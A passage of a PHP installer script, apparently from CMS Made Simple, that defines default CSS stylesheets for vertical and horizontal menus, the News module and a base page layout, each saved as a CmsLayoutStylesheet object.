/* Vertical menu for the CMS CSS Menu Module */\r\n/* by Alexander Endresen and mark and Nuno */\r\n/* The wrapper determines the width of the menu elements */\r\n#menuwrapper {\r\n/* just smaller than it\'s containing div */\r\n	width: 95%;\r\n	margin-left: 0px;\r\n/* room at bottom */\r\n	margin-bottom: 10px;\r\n}\r\n/* Unless you know what you do, do not touch this */\r\n#primary-nav, #primary-nav ul {\r\n/* remove any default bullets */\r\n	list-style: none;\r\n	margin: 0px;\r\n	padding: 0px;\r\n/* make sure it fills out */\r\n	width: 100%;\r\n/* just a little bump */\r\n	margin-left: 1px;\r\n}\r\n#primary-nav ul {\r\n/* make the ul stay in place so when we hover it lets the drops go over the content below else it will push everything below out of the way */\r\n	position: absolute;\r\n/* just a little bump down for second level ul */\r\n	top: 5px;\r\n/* keeps the left side of this ul on the right side of the one it came out of */\r\n	left: 100%;\r\n/* keeps it hidden till hover event */\r\n	display: none;\r\n}\r\n#primary-nav ul ul {\r\n/* no bump down for third level ul */\r\n	top: 0px;\r\n}\r\n#primary-nav li {\r\n/* negative bottom margin pulls them together, images look like one border between */\r\n	margin-bottom: -1px;\r\n/* keeps within it\'s container */\r\n	position: relative;\r\n/* bottom padding pushes \"a\" up enough to show our image */\r\n	padding: 0px 0px 4px 0px;\r\n/* you can set your own image here */\r\n	background: url([[root_url]]/uploads/ngrey/liup.gif) no-repeat right bottom;\r\n}\r\n#primary-nav li li {\r\n/* you can set your width here, if no width or set auto it will only be as wide as the text in it  */\r\n	width: 220px;\r\n	padding: 0px;\r\n/* removes first level li image */\r\n	background-image: none;\r\n}\r\n/* Styling the basic apperance of the menu \"a\" elements */\r\nul#primary-nav li a {\r\n/* specific font size, this could be larger or smaller than default font size */\r\n	font-size: 1em;\r\n/* make sure we keep the font normal */\r\n	font-weight: normal;\r\n/* set default link colors */\r\n	color: #595959;\r\n/* pushes li out from the text, sort of like making links a certain size, if you give them a set width and/or height you may limit you ability to have as much text as you need */\r\n	padding: 0.8em 0.5em 0.5em 0.5em;\r\n/* makes it hold a shape */\r\n	display: block;\r\n/* removes underline from default link setting */\r\n	text-decoration: none;\r\n/* you can set your own image here this is tall enough to cover text heavy links */\r\n	background: url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\r\n}\r\nul#primary-nav a span {\r\n/* makes it hold a shape */\r\n	display: block;\r\n/* pushes text to right */\r\n	padding-left: 1.5em;\r\n}\r\nul#primary-nav li a:hover {\r\n/* stops image flicker in some browsers */\r\n	background: url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\r\n/* changes text color on hover */\r\n	color: #899092;\r\n}\r\nul#primary-nav li li a:hover {\r\n/* you can set your own image here, second level \"a\" */\r\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\r\n/* contrast color to image behind it */\r\n	color: #FFF;\r\n}\r\nul#primary-nav li a.menuactive {\r\n/* black and bold to set it off from non active */\r\n	color: #000;\r\n	font-weight: bold;\r\n}\r\nul#primary-nav li li a.menuactive {\r\n/* contrast color to image behind it, set below */\r\n	color: #FFF;\r\n/* not bold as text color and image behind it set it off from non active */\r\n	font-weight: normal;\r\n}\r\nul#primary-nav li ul a {\r\n/* insures alignment */\r\n	text-align: left;\r\n	margin: 0px;\r\n/* relative to it\'s container */\r\n	position: relative;\r\n/* more padding to left than default */\r\n	padding: 6px 3px 6px 15px;\r\n	font-weight: normal;\r\n/* darker than first level \"a\" */\r\n	color: #000;\r\n/* removes any borders that may have been set in first level */\r\n	border-top: 0 none;\r\n	border-right: 0 none;\r\n	border-left: 0 none;\r\n/* removes image set in first level \"a\" */\r\n	background: none;\r\n}\r\nul#primary-nav li ul {\r\n/* very lite grey color, by now you should know what the rest mean */\r\n	background: #F3F5F5;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	position: absolute;\r\n	width: auto;\r\n	height: auto;\r\n	display: none;\r\n	position: absolute;\r\n	z-index: 999;\r\n	border-top: 1px solid #FFFFFF;\r\n	border-bottom: 1px solid #374B51;\r\n	/*Info: The opacity property is  CSS3, however, will be valid just in CSS 3.1) http://jigsaw.w3.org/css-validator2) More Options chose CSS3 3) is full validate;)*/\r\n	opacity: 0.95;\r\n/* CSS 3 */\r\n}\r\n/* Fixes IE7 bug */\r\n#primary-nav li, #primary-nav li.menuparent {\r\n	min-height: 1em;\r\n}\r\n/* Styling the basic apperance of the second level active page elements (shows what page in the menu is being displayed) */\r\n#primary-nav li li.menuactive, #primary-nav li.menuactive.menuparenth li.menuactive {\r\n/* set your image here, dark grey image with white text set above*/\r\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\r\n}\r\n#primary-nav li.menuparent span {\r\n/* padding on left for image */\r\n	padding-left: 1.5em;\r\n/* down arrow to note it has children, left side of text */\r\n	background: url([[root_url]]/uploads/ngrey/active.png) no-repeat left center;\r\n}\r\n#primary-nav li.menuparent:hover li.menuparent span {\r\n/* remove left padding as image is on right side of text */\r\n	padding-left: 0;\r\n/* right arrow to note it has children, right side of text */\r\n	background: url([[root_url]]/uploads/ngrey/parent.png) no-repeat right center;\r\n}\r\n#primary-nav li.menuparenth li.menuparent span,\r\n#primary-nav li.menuparenth li.menuparenth span {\r\n/* same as above but this is for IE6, gif image as it can\'t handle transparent png */\r\n	padding-left: 0;\r\n	background: url([[root_url]]/uploads/ngrey/parent.gif) no-repeat right center;\r\n}\r\n#primary-nav li.menuparenth span,\r\n#primary-nav li.menuparent:hover span,\r\n#primary-nav li.menuparent.menuactive span,\r\n#primary-nav li.menuparent.menuactiveh span, {\r\n/* right arrow to note hover */\r\n	background: url([[root_url]]/uploads/ngrey/parent.png) no-repeat left center;\r\n}\r\n#primary-nav li li span,\r\n#primary-nav li.menuparent li span,\r\n#primary-nav li.menuparent:hover li span,\r\n#primary-nav li.menuparenth li span,\r\n#primary-nav li.menuparenth li.menuparenth li span,\r\n#primary-nav li.menuparent li.menuparent li span,\r\n#primary-nav li.menuparent li.menuparent:hover li span  {\r\n/* removes any images set above unless it\'s a parent or active parent */\r\n	background:  none;\r\n/* removes padding that is used for arrows */\r\n	padding-left: 0px;\r\n}\r\n/* IE6 flicker fix */\r\n#primary-nav li.menuh,\r\n#primary-nav li.mnuparenth,\r\n#primary-nav li.mnuactiveh {\r\n	background: url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\r\n	color: #899092;\r\n}\r\n#primary-nav li:hover li a {\r\n/* removes any images set above unless it\'s a parent or active parent */\r\n	background:  none;\r\n	color: #000;\r\n}\r\n/* The magic - set to work for up to a 3 level menu, but can be increased unlimited, for fourth level add\r\n#primary-nav li:hover ul ul ul,\r\n#primary-nav li.menuparenth ul ul ul,\r\n*/\r\n#primary-nav ul,\r\n#primary-nav li:hover ul,\r\n#primary-nav li:hover ul ul,\r\n#primary-nav li.menuparenth ul,\r\n#primary-nav li.menuparenth ul ul {\r\n	display: none;\r\n}\r\n/* for fourth level add\r\n#primary-nav ul ul ul li:hover ul,\r\n#primary-nav ul ul ul li.menuparenth ul,\r\n*/\r\n#primary-nav li:hover ul,\r\n#primary-nav ul li:hover ul,\r\n#primary-nav ul ul li:hover ul,\r\n#primary-nav li.menuparenth ul,\r\n#primary-nav ul li.menuparenth ul,\r\n#primary-nav ul ul li.menuparenth ul {\r\n	display: block;\r\n}\r\n/* IE Hack, will cause the css to not validate */\r\n#primary-nav li,\r\n#primary-nav li.menuparenth {\r\n	_float: left;\r\n	_height: 1%;\r\n}\r\n#primary-nav li a {\r\n	_height: 1%;\r\n}\r\n/* BIG NOTE: I didn\'t do anything to these 2, never tested */\r\n#primary-nav li.sectionheader {\r\n	border-left: 1px solid #006699;\r\n	border-top: 1px solid #006699;\r\n	font-size: 130%;\r\n	font-weight: bold;\r\n	padding: 1.5em 0 0.8em 0.5em;\r\n	background-color: #fff;\r\n	margin: 0;\r\n	width: 100%;\r\n}\r\n/* separator */\r\n#primary-nav li hr.separator {\r\n	display: block;\r\n	height: 0.5em;\r\n	color: #abb0b6;\r\n	background-color: #abb0b6;\r\n	width: 100%;\r\n	border: 0;\r\n	margin: 0;\r\n	padding: 0;\r\n	border-top: 1px solid #006699;\r\n	border-right: 1px solid #006699;\r\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Navigation CSSMenu - Vertical');
$css->set_description('Navigation CSS rules used in CSSMenu left + 1 column Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/* by Alexander Endresen and mark and Nuno */\r\n#menu_vert {\r\n/* no margin/padding so it fills the whole div */\r\n	margin: 0;\r\n	padding: 0;\r\n}\r\n.clearb {\r\n/* needed for some browsers */\r\n	clear: both;\r\n}\r\n#menuwrapper {\r\n/* set the background color for the menu here */\r\n	background-color: #243135;\r\n/* IE6 Hack */\r\n	height: 1%;\r\n	width: auto;\r\n/* one border at the top */\r\n	border-top: 1px solid #3F565C;\r\n	margin: 0;\r\n	padding: 0;\r\n}\r\nul#primary-nav, ul#primary-nav ul {\r\n/* remove any default bullets */\r\n	list-style-type: none;\r\n	margin: 0;\r\n	padding: 0;\r\n}\r\nul#primary-nav {\r\n/* pushes the menu div up to give room above for background color to show */\r\n	padding-top: 10px;\r\n/* keeps the first menu item off the left side */\r\n	padding-left: 10px;\r\n}\r\nul#primary-nav ul {\r\n/* make the ul stay in place so when we hover it lets the drops go over the content below else it will push everything below out of the way */\r\n	position: absolute;\r\n/* top being the bottom of the li it comes out of */\r\n	top: auto;\r\n/* keeps it hidden till hover event */\r\n	display: none;\r\n/* same size but different color for each border */\r\n	border-top: 1px solid #C8D3D7;\r\n	border-right: 1px solid #C8D3D7;\r\n	border-bottom: 1px solid #ADC0C7;\r\n	border-left: 1px solid #A5B9C0;\r\n}\r\nul#primary-nav ul ul {\r\n/* now we move the next level ul down from the top a little for distinction */\r\n	margin-top: 1px;\r\n/* pull it in on the left, helps us not lose the hover effect when going to next level */\r\n	margin-left: -1px;\r\n/* keeps the left side of this ul on the right side of the one it came out of */\r\n	left: 100%;\r\n/* sets the top of it inline with the li it came out of */\r\n	top: 0px;\r\n}\r\nul#primary-nav li {\r\n/* floating left will set menu items to line up left to right else they will stack top to bottom */\r\n	float: left;\r\n/* no margin/padding keeps them next to each other, the padding will be in the \"a\" */\r\n	margin: 0px;\r\n	padding: 0px;\r\n}\r\n#primary-nav li li {\r\n/* Set the width of the menu elements at second level. Leaving first level flexible. */\r\n	width: 220px;\r\n/* removes any left margin it may have picked up from the first li */\r\n	margin-left: 0px;\r\n/* keeps them tight to the one above, no missed hovers */\r\n	margin-top: -1px;\r\n/* removes the left float set in first li so these will stack from top down */\r\n	float: none;\r\n/* relative to the ul they are in */\r\n	position: relative;\r\n}\r\n/* set the \"a\" link look here */\r\nul#primary-nav li a {\r\n/* specific font size, this could be larger or smaller than default font size */\r\n	font-size: 1em;\r\n/* make sure we keep the font normal */\r\n	font-weight: normal;\r\n/* set default link colors */\r\n	color: #fff;\r\n/* pushes out from the text, sort of like making links a certain size, if you give them a set width and/or height you may limit you ability to have as much text as you need */\r\n	padding: 12px 15px 15px;\r\n	display: block;\r\n/* sets no underline on links */\r\n	text-decoration: none;\r\n}\r\nul#primary-nav li a:hover {\r\n/* kind of obvious */\r\n	background-color: transparent;\r\n}\r\nul#primary-nav li li a:hover {\r\n/* this is set to #000, black, below so hover will be white text */\r\n	color: #FFF;\r\n}\r\nul#primary-nav li a.menuactive {\r\n	color: #000;\r\n/* bold to set it off from non active */\r\n	font-weight: bold;\r\n/* set your image here */\r\n	background:  url([[root_url]]/uploads/ngrey/nav.png) repeat-x left 0px;\r\n}\r\nul#primary-nav li a.menuactive:hover {\r\n	color: #000;\r\n/* keep it the same */\r\n	font-weight: bold;\r\n}\r\n#primary-nav li li a.menuparent span {\r\n/* makes it hold a shape */\r\n	display: block;\r\n/* set your image here, right arrow, 98% over from the left, 100% or \'right\' puts it to far */\r\n	background:  url([[root_url]]/uploads/ngrey/parent.png) no-repeat 98% center;\r\n}\r\n/* gif for IE6, as it can\'t handle transparent png */\r\n* html #primary-nav li li a.menuparent span {\r\n/* set your image here, right arrow, 98% over from the left, 100% or \'right\' puts it to far */\r\n	background:  url([[root_url]]/uploads/ngrey/parent.gif) no-repeat 98% center;\r\n}\r\nul#primary-nav li ul a {\r\n/* insures alignment */\r\n	text-align: left;\r\n	margin: 0px;\r\n/* keeps it relative to it\'s container */\r\n	position: relative;\r\n/* less padding than first level no need for large links here */\r\n	padding: 6px 3px 6px 15px;\r\n/* if first level is set to bold this will reset this level */\r\n	font-weight: normal;\r\n/* first level is #FFF/white, we need black to contrast with light background */\r\n	color: #000;\r\n	border-top: 0 none;\r\n	border-right: 0 none;\r\n	border-left: 0 none;\r\n}\r\nul#primary-nav li ul {\r\n/* very lite grey color, by now you should know what the rest mean */\r\n	background: #F3F5F5;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	position: absolute;\r\n	width: auto;\r\n	height: auto;\r\n	display: none;\r\n	position: absolute;\r\n	z-index: 999;\r\n	border-top: 1px solid #FFFFFF;\r\n	border-bottom: 1px solid #374B51;\r\n/*Info: The opacity property is  CSS3, however, will be valid just in CSS 3.1) http://jigsaw.w3.org/css-validator2) More Options chose CSS3 3) is full validate;)*/\r\n	opacity: 0.95;\r\n/* CSS 3 */\r\n}\r\nul#primary-nav li ul ul {\r\n/*Info: The opacity property is  CSS3, however, will be valid just in CSS 3.1) http://jigsaw.w3.org/css-validator2) More Options chose CSS3 3) is full validate;)*/\r\n	opacity: 95;\r\n/* CSS 3 */\r\n}\r\n/* Styling the appearance of menu items on hover */\r\n#primary-nav li:hover,\r\n#primary-nav li.menuh,\r\n#primary-nav li.menuparenth,\r\n#primary-nav li.menuactiveh {\r\n/* set your image here, dark grey image */\r\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\r\n	color: #000\r\n}\r\n/* The magic - set to work for up to a 3 level menu, but can be increased unlimited, for fourth level add\r\n#primary-nav li:hover ul ul ul,\r\n#primary-nav li.menuparenth ul ul ul,\r\n*/\r\n#primary-nav ul,\r\n#primary-nav li:hover ul,\r\n#primary-nav li:hover ul ul,\r\n#primary-nav li.menuparenth ul,\r\n#primary-nav li.menuparenth ul ul {\r\n	display: none;\r\n}\r\n/* for fourth level add\r\n#primary-nav ul ul ul li:hover ul,\r\n#primary-nav ul ul ul li.menuparenth ul,\r\n*/\r\n#primary-nav li:hover ul,\r\n#primary-nav ul li:hover ul,\r\n#primary-nav ul ul li:hover ul,\r\n#primary-nav li.menuparenth ul,\r\n#primary-nav ul li.menuparenth ul,\r\n#primary-nav ul ul li.menuparenth ul {\r\n	display: block;\r\n}\r\n/* IE6 Hacks */\r\n#primary-nav li li {\r\n	float: left;\r\n	clear: both;\r\n}\r\n#primary-nav li li a {\r\n	height: 1%;\r\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Navigation CSSMenu - Horizontal');
$css->set_description('Navigation CSS rules used in CSSMenu top + 2 columns Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
div#news {\n/* margin for the entire div surrounding the news items */\n	margin: 2em 0 1em 1em;\n/* border set here */\n	border: 1px solid #909799;\n/* sets it off from surroundings */\n	background: #f5f5f5;\n}\ndiv#news h2 {\n	line-height: 2em;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\n	color: #f5f5f5;\n	border: none\n}\n.NewsSummary {\n/* padding for the news article summary */\n	padding: 0.5em 0.5em 1em;\n/* margin to the bottom of the news article summary */\n	margin: 0 0.5em 1em 0.5em;\n	border-bottom: 1px solid #ccc;\n}\n.NewsSummaryPostdate {\n/* smaller than default text size */\n	font-size: 90%;\n/* bold to set it off from text */\n	font-weight: bold;\n}\n.NewsSummaryLink {\n/* bold to set it off from text */\n	font-weight: bold;\n/* little more room at top */\n	padding-top: 0.2em;\n}\n.NewsSummaryCategory {\n/* italic to set it off from text */\n	font-style: italic;\n	margin: 5px 0;\n}\n.NewsSummaryAuthor {\n/* italic to set it off from text */\n	font-style: italic;\n	padding-bottom: 0.5em;\n}\n.NewsSummarySummary, .NewsSummaryContent {\n/* larger than default text */\n	line-height: 140%;\n}\n.NewsSummaryMorelink {\n	padding-top: 0.5em;\n}\n#NewsPostDetailDate {\n/* smaller text */\n	font-size: 90%;\n	margin-bottom: 5px;\n/* bold to set it off from text */\n	font-weight: bold;\n}\n#NewsPostDetailSummary {\n/* larger than default text */\n	line-height: 150%;\n}\n#NewsPostDetailCategory {\n/* italic to set it off from text */\n	font-style: italic;\n	border-top: 1px solid #ccc;\n	margin-top: 0.5em;\n	padding: 0.2em 0;\n}\n#NewsPostDetailContent {\n	margin-bottom: 15px;\n/* larger than default text */\n	line-height: 150%;\n}\n#NewsPostDetailAuthor {\n	padding-bottom: 1.5em;\n/* italic to set it off from text */\n	font-style: italic;\n}\n/* more divs, left unstyled, just so you know the IDs of them */ \n#NewsPostDetailTitle {\n}\n#NewsPostDetailHorizRule {\n}\n#NewsPostDetailPrintLink {\n}\n#NewsPostDetailReturnLink {\n}\ndiv#news ul li {\n	padding: 2px 2px 2px 5px;\n	margin-left: 20px;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Module News');
$css->set_description('Default News module CSS rules used in multiple Designs');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/********************MENU*********************/\n/* hack for IE6 */\n* html div#menu_horiz {\n/* hide ie/mac \\*/\n	height: 1%;\n/* end hide */\n}\ndiv#menu_horiz {\n/* background color for the entire menu row */\n	background-color: #243135;\n/* insure full width */\n	width: 100%;\n/* set height */\n	height: 49px;\n	margin: 0;\n}\ndiv#menu_horiz ul {\n/* remove any default bullets */\n	list-style-type: none;\n	margin: 0;\n/* pushes the menu div up to give room above for background color to show */\n	padding-top: 10px;\n/* keeps the first menu item off the left side */\n	padding-left: 10px;\n}\n/* menu list items */\ndiv#menu_horiz li {\n/* makes the list horizontal */\n	float: left;\n/* remove any default bullets */\n	list-style: none;\n/* still no margin */\n	margin: 0;\n}\n/* the links, that is each list item */\ndiv#menu_horiz a, div#menu_horiz h3 span, div#menu_horiz .sectionheader span {\n/* pushes li out from the text, sort of like making links a certain size, if you give them a set width and/or height you may limit you ability to have as much text as you need */\n	padding: 12px 15px 15px 0px;\n/* still no margin */\n	margin: 0;\n/* removes default underline */\n	text-decoration: none;\n/* default link color */\n	color: #FFF;\n/* makes it hold a shape, IE has problems with this, fixed above */\n	display: block;\n}\n/* hover state for links */\ndiv#menu_horiz li a:hover {;\n/* set your image here, dark grey image with white text set above*/\n	background:  url([[root_url]]/uploads/ngrey/nav.png) repeat-x left -50px;\n}\ndiv#menu_horiz a span {\n/* compensates for no left padding on the "a" */\n	padding-left: 15px;\n}\ndiv#menu_horiz li.parent a span {\n/* no left padding on the "a" we can set it here, it lets us use the span for an image */\n	padding-left: 20px;\n/* set your image here, down arrow to note it has children, left side of text */\n	background: url([[root_url]]/uploads/ngrey/active.gif) no-repeat 0.3em center;\n}\ndiv#menu_horiz li.parent a:hover span {\n	padding-left: 20px;\n/* hover replaces default with right arrow image */\n	background: url([[root_url]]/uploads/ngrey/parent.gif) no-repeat 0.3em center;\n}\ndiv#menu_horiz li.menuactive a span {\n	padding-left: 20px;\n/* menuactive replaces default with right arrow image */\n	background: url([[root_url]]/uploads/ngrey/parent.gif) no-repeat 0.5em center;\n	color: #000;\n}\ndiv#menu_horiz li.currentpage h3 span {\n	padding-left: 12px;\n/* menuactive replaces default with right arrow image */\n	background: url([[root_url]]/uploads/ngrey/nav.png) repeat-x left 0px;\n	color: #000;\n}\ndiv#menu_horiz .sectionheader span {\n/* compensates for no left padding on the "sectionheader" */\n	padding-left: 15px;\n}\n/* active parent, that is the first level parent of a child page that is the current page */\ndiv#menu_horiz li.menuactive, div#menu_horiz li.menuactive a:hover {\n/* set your image here, light image with #000/black text set below*/\n	background:  url([[root_url]]/uploads/ngrey/nav.png) repeat-x left 0px;\n	color: #000;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Navigation Simple - Horizontal');
$css->set_description('Navigation CSS rules used in Top simple navigation + left subnavigation + 1 column and Left simple navigation + 1 column Designs');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/* browsers interpret margin and padding a little differently, we'll remove all default padding and margins and set them later on */\n* {\n	margin: 0;\n	padding: 0;\n}\n/*Set initial font styles*/\nbody {\n	text-align: left;\n	font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;\n	font-size: 75.01%;\n	line-height: 1em;\n}\n/*set font size for all divs, this overrides some body rules*/\ndiv {\n	font-size: 1em;\n}\n/*if img is inside "a" it would have borders, we don't want that*/\nimg {\n	border: 0;\n}\n/*default link styles*/\n/* set all links to have underline and bluish color */\na, a:link a:active {\n	text-decoration: underline;\n/* css validation will give a warning if color is set without background color. this will explicitly tell this element to inherit bg colour from parent element */\n	background-color: inherit;\n	color: #18507C;\n}\na:visited {\n	text-decoration: underline;\n	background-color: inherit;\n	color: #18507C;\n/* a different color can be used for visited links */\n}\n/* remove underline on hover and change color */\na:hover {\n	text-decoration: none;\n	background-color: inherit;\n	color: #385C72;\n}\n/*****************basic layout *****************/\nbody {\n	margin: 0;\n	padding: 0;\n/* default text color for entire site*/\n	color: #333;\n/* you can set your own image and background color here */\n	background: #f4f4f4 url([[root_url]]/uploads/ngrey/body.png) repeat-x left top;\n}\ndiv#pagewrapper {\n/* min max width, IE wont understand these, so we will use java script magic in the <head> */\n	max-width: 99em;\n	min-width: 60em;\n/* now that width is set this centers wrapper */\n	margin: 0 auto;\n	background-color: #fefefe;\n	color: black;\n}\n/* header, we will hide h1 a text and replace it with an image, we assign a height for it so the image wont cut off */\ndiv#header {\n/* adjust according your image size */\n	height: 100px;\n	margin: 0;\n	padding: 0;\n	/* you can set your own image here, will go behind h1 a image */\n	background: #f4f4f4 url([[root_url]]/uploads/ngrey/bg_banner.png) repeat-x left top;\n/* border just the bottom */\n	border-bottom: 1px solid #D9E2E6;\n}\ndiv#header h1 a {\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/logoCMS.png) no-repeat left top;\n/* this will make the "a" link a solid shape */\n	display: block;\n/* adjust according your image size */\n	height: 100px;\n/* this hides the text */\n	text-indent: -999em;\n/* old firefox would have shown underline for the link, this explicitly hides it */\n	text-decoration: none;\n}\ndiv#header h1 {\n	margin: 0;\n	padding: 0;\n/*these keep IE6 from pushing the header to more than the set size*/\n	line-height: 0;\n	font-size: 0;\n/* this will keep IE6 from flickering on hover */\n	background: url([[root_url]]/uploads/ngrey/logoCMS.png) no-repeat left top;\n}\ndiv#header h2 {\n/* this is where the site name is */\n	float: right;\n	line-height: 1.2em;\n/* this keeps IE6 from not showing the whole text */\n	font-size: 1.5em;\n/* keeps the size uniform */\n	margin: 35px 65px 0px 0px;\n/* adjust according your text size */\n	color: #f4f4f4;\n}\ndiv.crbk {\n/* sets all to 0 */\n	margin: 0;\n	padding: 0;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrtup.gif) no-repeat right bottom;\n}\ndiv.breadcrumbs {\n/* CSS short hand rule first value is top then right, bottom and left */\n	padding: 1em 0em 1em 1em;\n/* its good to set font sizes to be relative, this way viewer can change his/her font size */\n	font-size: 90%;\n/* css shorthand rule will be opened to be "0px 0px 0px 0px" */\n	margin: 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainleftup.gif) no-repeat left bottom;\n}\ndiv.breadcrumbs span.lastitem {\n	font-weight: bold;\n}\ndiv#search {\n/* position for the search box */\n	float: right;\n/* enough width for the search input box */\n	width: 27em;\n	text-align: right;\n	padding: 0.5em 0 0.2em 0;\n	margin: 0 1em;\n}\n/* a class for Submit button for the search input box */\ninput.search-button {\n	border: none;\n	height: 22px;\n	width: 53px;\n	margin-left: 5px;\n	padding: 0px 2px 2px 0px;\n/* makes the hover cursor show, you can set your own cursor here */\n	cursor: pointer;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/search.gif) no-repeat center center;\n}\ndiv#content {\n/* some air above and under menu and content */\n	margin: 1.5em auto 2em 0;\n	padding: 0px;\n}\n/* this gets all the outside calls that were used on the div#main before  */\ndiv.back1 {\n/* this will give room for sidebar to be on the left side, make sure this number is bigger than sidebar width */\n	margin-left: 29%;\n/* and some air on the right */\n	margin-right: 2%;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrt1.gif) no-repeat right top;\n}\n/* this is an IE6 hack, you may see these through out the CSS */\n* html div.back1 {\n/* unlike other browser IE6 needs float:right and a width */\n	float: right;\n	width: 69%;\n/* and we take this out or it will stop at the bottom  */\n	margin-left: 0%;\n/* and some air on the right */\n	margin-right: 10px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrt1.gif) no-repeat right top;\n}\ndiv.back2 {\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainleft1.gif) no-repeat left top;\n}\ndiv.back3 {\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wbtmleft.gif) no-repeat left bottom;\n}\ndiv#main {\n/* this is the last inside div so we set the space inside it to keep all content away from the edges of images/box */\n	padding: 10px 15px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/rtup.gif) no-repeat right bottom;\n}\ndiv#sidebar {\n/* set sidebar left. Change to right, float: right; instead, but you will need to change the margins. */\n	float: left;\n/* sidebar width, if you change this change div.back and/or div.back1 margins */\n	width: 26%;\n/* FIX IE double margin bug */\n	display: inline;\n/* the 20px is on the bottom, insures space above footer if longer than content */\n	margin: 0px 0px 20px;\n	padding: 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrt.gif) no-repeat right top;\n}\ndiv#sidebarb {\n	padding: 10px 15px 10px 20px;\n/* this one is for sidebar with content and no menu */\n	background: url([[root_url]]/uploads/ngrey/mainrtup.gif) no-repeat right bottom;\n}\ndiv#sidebarb div#news {\n/* less margin surrounding the news, sidebarb has enough */\n	margin: 2em 0 1em 0em;\n}\ndiv#sidebara {\n	padding: 10px 15px 15px 0px;\n/* this one is for sidebar with menu and no content */\n	background: url([[root_url]]/uploads/ngrey/mainrtup.gif) no-repeat right bottom;\n}\ndiv.footback {\n/* keep footer below content and menu */\n	clear: both;\n/* this sets 10px on right to let the right image show, the balance 10px left on next div */\n	padding: 0px 10px 0px 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wfootrt.gif) no-repeat right top;\n}\ndiv#footer {\n/* this sets 10px on left to balance 10px right on last div */\n	padding: 0px 0px 0px 10px;\n/* color of text, the link color is set below */\n	color: #595959;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wtopleft.gif) no-repeat left top;\n}\ndiv.leftfoot {\n	float: left;\n	width: 30%;\n	margin-left: 20px\n}\ndiv#footer p {\n/* sets different font size from default */\n	font-size: 0.8em;\n/* some air for footer */\n	padding: 1.5em;\n/* centered text */\n	text-align: center;\n	margin: 0;\n}\ndiv#footer p a {\n/* footer link would be same color as default we want it same as footer text */\n	color: #595959;\n}\n/* as we hid all hr for accessibility we create new hr with div class="hr" element */\ndiv.hr {\n	height: 1px;\n	padding: 1em;\n	border-bottom: 1px dotted black;\n	margin: 1em;\n}\n/* relational links under content */\ndiv.left49 {\n/* combined percentages of left+right equaling 100%  might lead to rounding error on some browser */\n	width: 70%;\n}\ndiv.right49 {\n	float: right;\n	width: 29%;\n/* set right to keep text on right */\n	text-align: right;\n}\n/********************CONTENT STYLING*********************/\n/* HEADINGS */\ndiv#content h1 {\n/* font size for h1 */\n	font-size: 2em;\n	line-height: 1em;\n	margin: 0;\n}\ndiv#content h2 {\n	color: #294B5F;\n/* font size for h2 the higher the h number the smaller the font size, most times */\n	font-size: 1.5em;\n	text-align: left;\n/* some air around the text */\n	padding-left: 0.5em;\n	padding-bottom: 1px;\n/* set borders around header */\n	border-bottom: 1px solid #899092;\n	border-left: 1.1em solid #899092;\n/* a larder than h1 line height */\n	line-height: 1.5em;\n/* and some air under the border */\n	margin: 0 0 0.5em 0;\n}\ndiv#content h3 {\n	color: #294B5F;\n	font-size: 1.3em;\n	line-height: 1.3em;\n	margin: 0 0 0.5em 0;\n}\ndiv#content h4 {\n	color: #294B5F;\n	font-size: 1.2em;\n	line-height: 1.3em;\n	margin: 0 0 0.25em 0;\n}\ndiv#content h5 {\n	color: #294B5F;\n	font-size: 1.1em;\n	line-height: 1.3em;\n	margin: 0 0 0.25em 0;\n}\nh6 {\n	color: #294B5F;\n	font-size: 1em;\n	line-height: 1.3em;\n	margin: 0 0 0.25em 0;\n}\n/* END HEADINGS */\n/* TEXT */\np {\n/* default p font size, this is set different in some other divs */\n	font-size: 1em;\n/* some air around p elements */\n	margin: 0 0 1.5em 0;\n	line-height: 1.4em;\n	padding: 0;\n}\nblockquote {\n	border-left: 10px solid #ddd;\n	margin-left: 10px;\n}\nstrong, b {\n/* explicit setting for these */\n	font-weight: bold;\n}\nem, i {\n/* explicit setting for these */\n	font-style: italic;\n}\n/* Wrapping text in <code> tags. Makes CSS not validate */\ncode, pre {\n/* css-3 */\n	white-space: pre-wrap;\n/* Mozilla, since 1999 */\n	white-space: -moz-pre-wrap;\n/* Opera 4-6 */\n	white-space: -pre-wrap;\n/* Opera 7 */\n	white-space: -o-pre-wrap;\n/* Internet Explorer 5.5+ */\n	word-wrap: break-word;\n	font-family: "Courier New", Courier, monospace;\n	font-size: 1em;\n}\npre {\n/* black border for pre blocks */\n	